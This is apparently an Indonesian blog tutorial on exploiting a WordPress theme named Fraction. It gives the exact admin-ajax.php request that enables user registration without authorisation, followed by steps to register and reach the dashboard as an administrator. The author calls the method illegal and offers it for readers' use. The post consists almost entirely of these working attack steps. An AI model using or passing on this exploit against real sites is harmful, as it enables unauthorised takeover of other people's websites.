Exploit nya masih anget kak :p . Baru kemaren dirilis di 1337day. Oke langsung saja ya alat dan bahan nya :3
Google Dorks : —
Vulnerability : /fraction-theme/functions/ajax.php
How to Exploit :
localhost/wordpress/wp-admin/admin-ajax.php?action=ot_save_options&users_can_register=1
Jika fitur register sebelumnya dilarang, dengan command ini maka fitur register akan dibuka secara ilegal.
Habis itu, buka localhost/wordpress/wp-login.php?action=register
Cek email, masukin user dan password, logged to dashboard as Admin 🙂
Sekian tutor kali ini semoga bermanfaat.
Leave a Reply